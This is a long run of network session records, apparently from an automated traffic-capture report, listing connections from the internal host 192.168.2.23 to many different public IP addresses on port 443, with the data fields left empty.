                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12137192.168.2.233632281.178.152.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12138192.168.2.234357269.254.217.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12139192.168.2.2334580102.99.93.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12140192.168.2.234545438.176.222.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12141192.168.2.236023649.252.98.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12142192.168.2.234703494.128.14.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12143192.168.2.2360516160.240.231.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12144192.168.2.2359442107.35.174.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12145192.168.2.235426666.183.245.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12146192.168.2.2357204156.156.78.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12147192.168.2.235727085.131.216.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12148192.168.2.2350016138.29.97.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12149192.168.2.2357630146.143.228.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12150192.168.2.233317264.52.5.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12151192.168.2.2334750167.158.172.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12152192.168.2.2356310176.174.28.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12153192.168.2.2349140205.5.209.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12154192.168.2.2343276208.75.195.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12155192.168.2.2349126121.75.212.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12156192.168.2.2342588191.236.218.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12157192.168.2.2350294125.8.95.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12158192.168.2.2340208155.131.239.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12159192.168.2.2352908179.36.236.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12160192.168.2.2356834187.183.241.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12161192.168.2.2351442116.65.92.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12162192.168.2.2360488135.95.133.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12163192.168.2.2356564193.30.199.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12164192.168.2.235995263.172.22.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12165192.168.2.235033049.187.98.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12166192.168.2.2340740151.38.14.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12167192.168.2.234749864.155.100.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12168192.168.2.2357454161.236.250.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12169192.168.2.234287292.116.70.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12170192.168.2.2347780158.255.255.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12171192.168.2.2360048173.87.187.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12172192.168.2.235002484.110.26.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12173192.168.2.2357334133.138.175.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12174192.168.2.2343938216.34.224.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12175192.168.2.235646698.18.119.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12176192.168.2.2338432195.115.213.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12177192.168.2.235102879.52.181.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12178192.168.2.23437748.25.2.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12179192.168.2.2351486157.52.208.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12180192.168.2.233836881.39.247.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12181192.168.2.234947271.228.3.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12182192.168.2.235899646.165.119.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12183192.168.2.2350438146.181.152.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12184192.168.2.233631894.240.195.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12185192.168.2.2351382223.217.56.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12186192.168.2.2354848100.128.168.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12187192.168.2.233897495.40.250.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12188192.168.2.2337028166.59.4.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12189192.168.2.2346290120.92.166.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12190192.168.2.2357138213.182.11.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12191192.168.2.2335414143.168.50.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12192192.168.2.2350100173.240.119.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12193192.168.2.2334520193.218.96.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12194192.168.2.2335580195.118.37.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12195192.168.2.2354252154.143.168.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12196192.168.2.234374057.107.98.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12197192.168.2.234192436.210.58.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12198192.168.2.2359692157.64.43.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12199192.168.2.2341744178.202.4.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12200192.168.2.2340892220.105.67.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12201192.168.2.2352224186.247.176.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12202192.168.2.2346928132.137.32.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12203192.168.2.2356918171.137.143.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12204192.168.2.2336028111.246.167.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12205192.168.2.2349514213.37.218.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12206192.168.2.235806440.74.143.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12207192.168.2.2345308191.136.57.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12208192.168.2.234340685.255.213.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12209192.168.2.2350880121.225.208.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12210192.168.2.234189671.159.43.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12211192.168.2.233536462.208.173.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12212192.168.2.235520620.218.25.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12213192.168.2.233532289.159.47.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12214192.168.2.233368674.189.39.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12215192.168.2.233676663.25.246.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12216192.168.2.236058871.151.24.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12217192.168.2.234584839.51.80.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12218192.168.2.235054649.61.63.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12219192.168.2.2355010147.59.71.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12220192.168.2.233528499.155.252.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12221192.168.2.2356104166.210.200.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12222192.168.2.234061012.229.198.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12223192.168.2.2359466188.54.53.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12224192.168.2.2348518107.122.107.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12225192.168.2.2344374199.71.35.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12226192.168.2.2342556182.170.115.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12227192.168.2.2339248120.227.119.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12228192.168.2.236081666.103.96.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12229192.168.2.233350277.68.66.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12230192.168.2.2342542179.113.3.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12231192.168.2.2357452174.196.107.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12232192.168.2.234649699.175.169.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12233192.168.2.233634648.48.160.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12234192.168.2.234554462.151.202.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12235192.168.2.235652279.65.216.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12236192.168.2.234472213.94.22.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12237192.168.2.2358440120.5.17.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12238192.168.2.234238251.44.227.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12239192.168.2.2360758124.33.103.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12240192.168.2.234605650.240.198.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12241192.168.2.234557898.119.106.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12242192.168.2.233778469.214.40.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12243192.168.2.2344138189.35.54.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12244192.168.2.234656412.145.83.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12245192.168.2.233748617.201.112.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12246192.168.2.235245274.122.76.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12247192.168.2.235696073.195.176.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12248192.168.2.2353858210.5.4.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12249192.168.2.2335386223.83.44.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12250192.168.2.2337912102.83.82.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12251192.168.2.2354124143.103.130.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12252192.168.2.2340696169.31.69.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12253192.168.2.2357232157.86.167.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12254192.168.2.2359974144.182.51.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12255192.168.2.2348752168.189.33.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12256192.168.2.233830443.163.34.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12257192.168.2.2349828162.192.233.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12258192.168.2.2351672117.90.62.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12259192.168.2.233430052.170.97.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12260192.168.2.234016838.47.197.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12261192.168.2.235967666.15.244.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12262192.168.2.2341942151.51.238.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12263192.168.2.2341626161.186.134.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12264192.168.2.2357726185.147.217.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12265192.168.2.2344968167.248.91.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12266192.168.2.233399087.42.8.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12267192.168.2.2340870222.228.98.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12268192.168.2.2351510149.145.23.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12269192.168.2.2347988198.135.192.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12270192.168.2.234382666.203.179.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12271192.168.2.235760014.247.30.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12272192.168.2.235021475.165.122.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12273192.168.2.2348688113.75.151.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12274192.168.2.2339238220.109.12.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12275192.168.2.236002888.75.48.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12276192.168.2.233758612.159.253.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12277192.168.2.236048289.159.131.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12278192.168.2.236022069.186.32.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12279192.168.2.236024495.184.41.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12280192.168.2.23460061.99.39.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12281192.168.2.234436249.105.197.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12282192.168.2.2350966173.4.234.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12283192.168.2.2335398163.236.30.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12284192.168.2.235995812.105.121.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12285192.168.2.235186446.235.147.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12286192.168.2.234511697.25.167.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12287192.168.2.235344299.124.192.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12288192.168.2.2334196133.83.234.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12289192.168.2.233537860.132.169.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12290192.168.2.234069280.176.0.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12291192.168.2.2358086140.103.216.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12292192.168.2.23575341.96.33.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12293192.168.2.234427859.125.242.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12294192.168.2.236056875.20.2.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12295192.168.2.2336018191.198.56.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12296192.168.2.2357248133.26.80.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12297192.168.2.2336510143.58.155.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12298192.168.2.2336500146.70.39.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12299192.168.2.235783671.60.71.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12300192.168.2.2337714219.85.190.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12301192.168.2.2345220109.132.97.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12302192.168.2.2348666149.235.14.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12303192.168.2.233826017.239.169.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12304192.168.2.2335406155.115.249.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12305192.168.2.234831238.227.6.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12306192.168.2.234041471.130.136.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12307192.168.2.2340858118.134.92.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12308192.168.2.235208298.198.125.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12309192.168.2.233484818.167.207.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12310192.168.2.235559023.85.156.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12311192.168.2.2357158178.62.162.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12312192.168.2.2352366191.107.191.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12313192.168.2.2348250210.20.255.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12314192.168.2.2334948148.59.113.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12315192.168.2.2358924128.166.129.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12316192.168.2.235128623.12.252.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12317192.168.2.2353772223.84.107.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12318192.168.2.2343358151.17.109.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12319192.168.2.2359708164.193.122.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12320192.168.2.2351494180.79.42.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12321192.168.2.233720878.231.223.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12322192.168.2.233847486.185.159.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12323192.168.2.2333480113.29.89.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12324192.168.2.2333110103.212.143.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12325192.168.2.2358984120.69.143.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12326192.168.2.234520690.173.66.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12327192.168.2.2355604204.125.200.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12328192.168.2.2358368146.14.159.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12329192.168.2.2346982131.191.133.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12330192.168.2.2340786171.51.133.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12331192.168.2.2355346169.153.209.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12332192.168.2.233993014.32.13.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12333192.168.2.2336526107.250.136.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12334192.168.2.2340538107.91.184.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12335192.168.2.2351702223.102.181.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12336192.168.2.235393444.168.216.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12337192.168.2.234686892.172.12.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12338192.168.2.233379271.235.63.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12339192.168.2.235196481.81.208.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12340192.168.2.2336548197.217.55.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12341192.168.2.2343032128.232.89.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12342192.168.2.234743296.23.137.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12343192.168.2.2348596179.89.161.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12344192.168.2.2353554171.30.30.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12345192.168.2.2345688166.243.88.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12346192.168.2.235608831.171.171.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12347192.168.2.2354022121.148.221.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12348192.168.2.2359514135.38.43.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12349192.168.2.2334120112.51.87.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12350192.168.2.2337470151.121.88.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12351192.168.2.2347240200.240.202.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12352192.168.2.2333042180.131.21.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12353192.168.2.235311265.253.243.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12354192.168.2.2350012220.133.91.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12355192.168.2.235662236.83.15.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12356192.168.2.2355298120.179.195.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12357192.168.2.233686095.171.64.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12358192.168.2.2339102119.229.249.162443
                                            TimestampBytes transferredDirectionData
